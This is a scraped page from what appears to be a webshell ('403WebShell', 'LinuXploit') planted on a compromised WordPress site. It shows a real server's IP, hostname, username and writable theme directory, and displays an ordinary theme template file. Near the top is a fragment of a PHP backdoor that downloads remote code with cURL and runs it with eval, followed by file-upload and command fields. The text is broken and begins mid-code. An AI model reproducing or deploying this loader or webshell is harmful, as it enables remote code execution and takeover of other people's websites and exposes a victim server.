Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

RLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?> 403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.129.71.13
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/misswavenigeria.com/wp-content/themes/ombre/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/misswavenigeria.com/wp-content/themes/ombre/single-ombremodels.php
<?php get_header(); ?>
<?php if ( have_posts() ) while ( have_posts() ) : the_post(); ?>

<?php $headerimage = get_post_meta( get_the_id(), 'ombre_featured_image_key', true ); ?>
<?php $subtitle = get_post_meta( get_the_id(), 'ombre_subtitle_key', true ); ?>
<?php $modellayout = get_post_meta( get_the_id(), 'ombremodellayout', true ); ?>
<?php $sidebarslider = get_post_meta( get_the_id(), 'ombresidebarslider', true ); ?>
<?php $relatedmodels = get_post_meta( get_the_id(), 'ombrerelatedmodels', true ); ?>

<?php if (!empty($headerimage)) { ?>
<div id="featured-image-container">
    <div class="img-loading"></div>
    <div id="featured-image" data-img="<?php echo esc_url($headerimage); ?>">
        <div id="featured-image-title">
            <h1><?php the_title(); ?></h1>
            <?php if (!empty($subtitle)) { ?>
                <p><span><?php echo esc_html($subtitle); ?></span></p>
            <?php } ?>
        </div>
    </div>
</div>
<?php } else { ?>
<div id="page-title">
    <h1><span><?php the_title(); ?></span></h1>
</div>
<?php if (!empty($subtitle)) { ?>
<div id="sub-title">
    <div><span><?php echo esc_html($subtitle); ?></span></div>
</div>
<?php } ?>
<?php } ?>

<div id="page-container">
    <div class="grid">
    <?php if ($modellayout == 'right') { ?>
        <div class="unit golden-large">
            <?php if ($sidebarslider != 'on') { 
            $sliderstyle = 'model-gallery';
            if (function_exists( 'ombre_slider' )) { ombre_slider(); }
            } ?>
            <?php the_content(); ?>
            <?php get_template_part( 'templates/education', 'template'); ?>
        </div>
        <div class="unit golden-small">
            <?php if ($sidebarslider == 'on') { 
            $sliderstyle = 'model-gallery2';
            if (function_exists( 'ombre_slider' )) { ombre_slider(); }
            } ?>
            <?php get_template_part( 'templates/modelsidebar', 'template'); ?>
        </div>
        <?php } elseif ($modellayout == 'left') { ?>
        <div class="unit golden-small">
            <?php if ($sidebarslider == 'on') { 
            $sliderstyle = 'model-gallery2';
            if (function_exists( 'ombre_slider' )) { ombre_slider(); }
            } ?>
            <?php get_template_part( 'templates/modelsidebar', 'template'); ?>
        </div>
        <div class="unit golden-large">
            <?php if ($sidebarslider != 'on') { 
            $sliderstyle = 'model-gallery';
            if (function_exists( 'ombre_slider' )) { ombre_slider(); }
            } ?>
            <?php the_content(); ?>
            <?php get_template_part( 'templates/education', 'template'); ?>
        </div>
        <?php } else { ?>
        <div class="unit whole">
            <?php $sliderstyle = 'model-gallery'; ?>
            <?php if (function_exists( 'ombre_slider' )) { ombre_slider(); } ?>
            <?php the_content(); ?>
            <?php get_template_part( 'templates/education', 'template'); ?>
        </div>
    <?php } ?>
    </div>
    <?php 
    if ($relatedmodels == 'on' && function_exists( 'ombre_carousel' )) { 
        ombre_carousel();
    } 
    ?>
</div>
<?php endwhile; ?>
<?php get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit